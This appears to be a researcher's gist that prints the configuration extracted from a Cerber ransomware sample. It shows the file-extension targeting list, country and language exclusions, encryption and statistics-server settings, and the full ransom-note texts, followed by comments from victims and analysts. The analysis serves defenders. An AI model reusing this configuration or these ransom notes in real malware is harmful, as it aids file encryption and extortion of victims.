
@hasherezade /config.json Secret
Last active Feb 2, 2017

Cerber ransomware — config.json extracted from the sample binary
{
"antiav": 1,
"blacklist": {
"countries": [
"am",
"az",
"by",
"ge",
"kg",
"kz",
"md",
"ru",
"tm",
"tj",
"ua",
"uz"
],
"files": [
"bootsect.bak",
"iconcache.db",
"thumbs.db",
"wallet.dat"
],
"folders": [
":\\$recycle.bin\\",
":\\$windows.~bt\\",
":\\boot\\",
":\\drivers\\",
":\\program files\\",
":\\program files (x86)\\",
":\\programdata\\",
":\\users\\all users\\",
":\\windows\\",
"\\appdata\\local\\",
"\\appdata\\locallow\\",
"\\appdata\\roaming\\",
"\\public\\music\\sample music\\",
"\\public\\pictures\\sample pictures\\",
"\\public\\videos\\sample videos\\",
"\\tor browser\\"
],
"languages": [
1049,
1058,
1059,
1064,
1067,
1068,
1079,
1087,
1088,
1090,
1091,
2072,
2073,
2092,
2115
]
},
"check": {
"activity": 0,
"country": 1,
"language": 1,
"vmware": 0
},
"debug": 0,
"encrypt": {
"files": [
[
".contact",
".dbx",
".doc",
".docx",
".jnt",
".jpg",
".mapimail",
".msg",
".oab",
".ods",
".pdf",
".pps",
".ppsm",
".ppt",
".pptm",
".prf",
".pst",
".rar",
".rtf",
".txt",
".wab",
".xls",
".xlsx",
".xml",
".zip",
".1cd",
".3ds",
".3g2",
".3gp",
".7z",
".7zip",
".accdb",
".aoi",
".asf",
".asp",
".aspx",
".asx",
".avi",
".bak",
".cer",
".cfg",
".class",
".config",
".css",
".csv",
".db",
".dds",
".dwg",
".dxf",
".flf",
".flv",
".html",
".idx",
".js",
".key",
".kwm",
".laccdb",
".ldf",
".lit",
".m3u",
".mbx",
".md",
".mdf",
".mid",
".mlb",
".mov",
".mp3",
".mp4",
".mpg",
".obj",
".odt",
".pages",
".php",
".psd",
".pwm",
".rm",
".safe",
".sav",
".save",
".sql",
".srt",
".swf",
".thm",
".vob",
".wav",
".wma",
".wmv",
".xlsb",
".3dm",
".aac",
".ai",
".arw",
".c",
".cdr",
".cls",
".cpi",
".cpp",
".cs",
".db3",
".docm",
".dot",
".dotm",
".dotx",
".drw",
".dxb",
".eps",
".fla",
".flac",
".fxg",
".java",
".m",
".m4v",
".max",
".mdb",
".pcd",
".pct",
".pl",
".potm",
".potx",
".ppam",
".ppsm",
".ppsx",
".pptm",
".ps",
".pspimage",
".r3d",
".rw2",
".sldm",
".sldx",
".svg",
".tga",
".wps",
".xla",
".xlam",
".xlm",
".xlr",
".xlsm",
".xlt",
".xltm",
".xltx",
".xlw",
".act",
".adp",
".al",
".bkp",
".blend",
".cdf",
".cdx",
".cgm",
".cr2",
".crt",
".dac",
".dbf",
".dcr",
".ddd",
".design",
".dtd",
".fdb",
".fff",
".fpx",
".h",
".iif",
".indd",
".jpeg",
".mos",
".nd",
".nsd",
".nsf",
".nsg",
".nsh",
".odc",
".odp",
".oil",
".pas",
".pat",
".pef",
".pfx",
".ptx",
".qbb",
".qbm",
".sas7bdat",
".say",
".st4",
".st6",
".stc",
".sxc",
".sxw",
".tlg",
".wad",
".xlk",
".aiff",
".bin",
".bmp",
".cmt",
".dat",
".dit",
".edb",
".flvv",
".gif",
".groups",
".hdd",
".hpp",
".log",
".m2ts",
".m4p",
".mkv",
".mpeg",
".ndf",
".nvram",
".ogg",
".ost",
".pab",
".pdb",
".pif",
".png",
".qed",
".qcow",
".qcow2",
".rvt",
".st7",
".stm",
".vbox",
".vdi",
".vhd",
".vhdx",
".vmdk",
".vmsd",
".vmx",
".vmxf",
".3fr",
".3pr",
".ab4",
".accde",
".accdr",
".accdt",
".ach",
".acr",
".adb",
".ads",
".agdl",
".ait",
".apj",
".asm",
".awg",
".back",
".backup",
".backupdb",
".bank",
".bay",
".bdb",
".bgt",
".bik",
".bpw",
".cdr3",
".cdr4",
".cdr5",
".cdr6",
".cdrw",
".ce1",
".ce2",
".cib",
".craw",
".crw",
".csh",
".csl",
".db_journal",
".dc2",
".dcs",
".ddoc",
".ddrw",
".der",
".des",
".dgc",
".djvu",
".dng",
".drf",
".dxg",
".eml",
".erbsql",
".erf",
".exf",
".ffd",
".fh",
".fhd",
".gray",
".grey",
".gry",
".hbk",
".ibank",
".ibd",
".ibz",
".iiq",
".incpas",
".jpe",
".kc2",
".kdbx",
".kdc",
".kpdx",
".lua",
".mdc",
".mef",
".mfw",
".mmw",
".mny",
".moneywell",
".mrw",
".myd",
".ndd",
".nef",
".nk2",
".nop",
".nrw",
".ns2",
".ns3",
".ns4",
".nwb",
".nx2",
".nxl",
".nyf",
".odb",
".odf",
".odg",
".odm",
".orf",
".otg",
".oth",
".otp",
".ots",
".ott",
".p12",
".p7b",
".p7c",
".pdd",
".pem",
".plus_muhd",
".plc",
".pot",
".pptx",
".psafe3",
".py",
".qba",
".qbr",
".qbw",
".qbx",
".qby",
".raf",
".rat",
".raw",
".rdb",
".rwl",
".rwz",
".s3db",
".sd0",
".sda",
".sdf",
".sqlite",
".sqlite3",
".sqlitedb",
".sr2",
".srf",
".srw",
".st5",
".st8",
".std",
".sti",
".stw",
".stx",
".sxd",
".sxg",
".sxi",
".sxm",
".tex",
".wallet",
".wb2",
".wpd",
".x11",
".x3f",
".xis",
".ycbcra",
".yuv"
]
],
"network": 0,
"new_extension": ".cerber",
"max_block_size": 2,
"max_blocks": 5,
"min_file_size": 0,
"multithread": 1,
"rsa_key_size": 576
},
"global_public_key": "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",
"help_files": {
"files": [
{
"file_body": "\r\n\r\n C E R B E R\r\n -----------\r\n\r\n\r\n Your documents, photos, databases and other important files have been encrypted!\r\n\r\n\r\n To decrypt your files follow the instructions:\r\n\r\n\r\n ---------------------------------------------------------------------------------------\r\n\r\n\r\n 1. Download and install the \"Tor Browser\" from https:\/\/www.torproject.org\/\r\n\r\n\r\n 2. Run it\r\n\r\n\r\n 3. In the \"Tor Browser\" open website:\r\n\r\n http:\/\/decrypttozxybarc.onion\/{PC_ID}\r\n\r\n\r\n 4. Follow the instructions at this website\r\n\r\n\r\n ---------------------------------------------------------------------------------------\r\n\r\n\r\n \u00c2\u00ab...Quod me non necat me fortiorem facit.\u00c2\u00bb\r\n",
"file_extension": ".txt"
},
{
"file_body": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n <head>\r\n <link href=\"http:\/\/maxcdn.bootstrapcdn.com\/bootstrap\/3.3.5\/css\/bootstrap.min.css\" rel=\"stylesheet\">\r\n <meta charset=\"utf-8\">\r\n <meta content=\"IE=edge\" http-equiv=\"X-UA-Compatible\">\r\n <meta content=\"width=device-width, initial-scale=1\" name=\"viewport\">\r\n <title>C E R B E R<\/title>\r\n <\/head>\r\n <body>\r\n <div class=\"container\">\r\n <h3 align=\"center\">C E R B E R<\/h3>\r\n <br \/>\r\n <h4>Your documents, photos, databases and other important files have been encrypted!<br \/><br \/>To decrypt your files follow the instructions:<\/h4>\r\n <br \/>\r\n <div class=\"well\">\r\n <h4>1.&nbsp;&nbsp;&nbsp;Download and install the &laquo;Tor Browser&raquo; from <a href=\"https:\/\/www.torproject.org\/download\/download-easy.html.en\" target=\"_blank\">https:\/\/www.torproject.org\/<\/a><\/h4>\r\n <br \/>\r\n <h4>2.&nbsp;&nbsp;&nbsp;Run it<\/h4>\r\n <br \/>\r\n <h4>3.&nbsp;&nbsp;&nbsp;In the &laquo;Tor Browser&raquo; open website:<br \/><br \/><div class=\"form-group\" style=\"margin: 0 32px 36px 32px;\"><input class=\"form-control\" style=\"color: #c24; font-size: 22px; height: 50px; text-align: center;\" type=\"text\" value=\"http:\/\/decrypttozxybarc.onion\/{PC_ID}\" readonly><\/div><\/h4>\r\n <h4>4.&nbsp;&nbsp;&nbsp;Follow the instructions at this website<\/h4>\r\n <\/div>\r\n <br \/>\r\n <p style=\"color: #ccc;\">&laquo;...Quod me non necat me fortiorem facit.&raquo;<\/p>\r\n <br \/>\r\n <\/div>\r\n <\/body>\r\n<\/html>\r\n",
"file_extension": ".html"
},
{
"file_body": "Set SAPI = CreateObject(\"SAPI.SpVoice\")\r\nSAPI.Speak \"Attention! Attention! Attention!\"\r\nFor i = 1 to 5\r\nSAPI.Speak \"Your documents, photos, databases and other important files have been encrypted!\"\r\nNext",
"file_extension": ".vbs"
}
],
"files_name": "# DECRYPT MY FILES #"
},
"ip_geo": [
{
"property_name": "country",
"url": "http:\/\/ipinfo.io\/json"
},
{
"property_name": "country_code",
"url": "http:\/\/freegeoip.net\/json\/"
},
{
"property_name": "countryCode",
"url": "http:\/\/ip-api.com\/json"
}
],
"servers": {
"statistics": {
"data_finish": "{MD5_KEY}",
"data_start": "{MD5_KEY}{PARTNER_ID}{OS}{IS_X64}{IS_ADMIN}{COUNT_FILES}{STOP_REASON}",
"ip": "87.98.128.0\/19",
"port": 6891,
"send_stat": 1,
"timeout": 1020
}
}
}
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvkty5qhqEydR9076Fevp
0uMP7IZNms1AA7GPQUThMWbYiEYIhBKcT0/nwYrBq0Ogv79K1tta04EHTrXgcAp/
OJgBhz9N58aewd4yZBm2coeaDGvcGRAc9e72ObFQ/TME/Io7LZ5qXDWzDafI8LA8
JQmSz0L+/G+LPTWg7kPOpJT7WSkRb9T8w5QgZRJuvvhErHM83kO3ELTH+SoEI53p
4ENVwfNNEpOpnpOOSKQobtIw56CsQFrhac0sQlOjek/muVluxjiEmc0fszk2WLSn
qryiMyzaI5DWBDjYKXA1tp2h/ygbkYdFYRbAEqwtLxT2wMfWPQI5OkhTa9tZqD0H
nQIDAQAB
-----END PUBLIC KEY-----
rhamb38 commented Apr 4, 2016

Could you send me an encrypted file for this sample?

I've got some recovered 'getKeys' files from an infected HD, and a 'listFiles' one too. Attached for investigation. I added a file-type extension in order to upload them, since they had none; I can share the originals if necessary. These are not JPEG files — they are of unknown type.

getkeys
listfiles

Can you share how you extracted this from the EXE?

Hi Guys,

I got infected with this ransomware last weekend and I managed to clean my laptop (apparently), but I'm stuck with the encrypted files.
Is there any software that can recover them?
Thank you in advance
